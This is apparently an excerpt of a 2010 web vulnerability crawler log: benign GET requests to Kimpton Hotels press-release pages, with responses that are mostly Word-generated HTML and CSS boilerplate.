text-indent:-.25in;
font-family:Symbol;}
@list l4
{mso-list-id:231933929;
mso-list-type:hybrid;
mso-list-template-ids:420377514 -906594726 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Verdana;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Times New Roman";}
@list l4:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l5
{mso-list-id:533346185;
mso-list-type:hybrid;
mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}
@list l5:level1
{mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l6
{mso-list-id:973101145;
mso-list-type:hybrid;
mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l7
{mso-list-id:1030841178;
mso-list-type:hybrid;
mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Calibri;}
@list l7:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}..
- /pdfs/press/html/Sweet-Tax-Relief-0310/

/pdfs/press/html/Sweet-Tax-Relief-0310/

http://www.kimptonhotels.com/pdfs/press/html/Sweet-Tax-Relief-0310/

Request

GET /pdfs/press/html/Sweet-Tax-Relief-0310/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Sweet-Tax-Relief-0310/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 32628
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>2</o:TotalTime> <o:LastPrinted>2010-03-04T00:44:00Z</o:LastPrinted> <o:Created>2010-03-04T00:44:00Z</o:Created> <o:LastSaved>2010-03-04T00:44:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>635</o:Words> <o:Characters>3621</o:Characters> <o:Lines>30</o:Lines> <o:Paragraphs>7</o:Paragraphs> <o:CharactersWithSpaces>4446</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:"Courier New";}@list l6 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial;}@list l6:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l10 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l11 {mso-list-id:1765494741; mso-list-type:hybrid; mso-list-template-ids:-1093994450 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="su..
- /pdfs/press/html/MMHIQ4-0410/index.html

/pdfs/press/html/MMHIQ4-0410/index.html

http://www.kimptonhotels.com/pdfs/press/html/MMHIQ4-0410/index.html

Request

GET /pdfs/press/html/MMHIQ4-0410/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 21068
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>Marliese Engel</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>2</o:TotalTime> <o:LastPrinted>2010-04-28T18:29:00Z</o:LastPrinted> <o:Created>2010-04-28T18:29:00Z</o:Created> <o:LastSaved>2010-04-28T18:29:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>676</o:Words> <o:Characters>3858</o:Characters> <o:Company>Baltz &amp; Company</o:Company> <o:Lines>32</o:Lines> <o:Paragraphs>7</o:Paragraphs> <o:CharactersWithSpaces>4737</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:50331648 0 0 0 16777216 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}h1 {mso-style-link:"Heading 1 Char"; mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS";}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {mso-style-noshow:yes; mso-style-link:"Plain Text Char"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; 